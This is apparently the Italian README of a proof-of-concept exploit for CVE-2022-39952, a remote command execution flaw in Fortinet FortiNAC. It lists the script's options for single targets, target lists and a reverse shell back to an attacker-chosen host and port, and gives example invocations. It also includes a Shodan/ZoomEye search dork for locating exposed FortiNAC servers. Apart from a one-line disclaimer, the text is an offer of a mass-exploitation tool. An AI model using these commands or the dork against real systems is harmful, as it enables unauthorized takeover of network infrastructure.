
PoC per CVE-2022-39952 che riguarda Fortinet FortiNAC.
Questo exploit consente a un attaccante di eseguire comandi arbitrari sul server FortiNAC. Si basa sul PoC sviluppato da horizon3ai, con opzioni aggiuntive per colpire più host.
Disclaimer: questo exploit è solo a scopo educativo. Si prega di usarlo in modo responsabile e con autorizzazione.
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
Per usare questo exploit, devi avere Python 3.x installato sul tuo sistema.
Python 3.x
modulo requests
modulo concurrent.futures
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
Questo exploit è stato testato solo su un numero limitato di target, quindi la sua efficacia può variare. La dork per trovare potenziali target su ZoomEye e Shodan è:
title:"FortiNAC" +"JSESSIONID"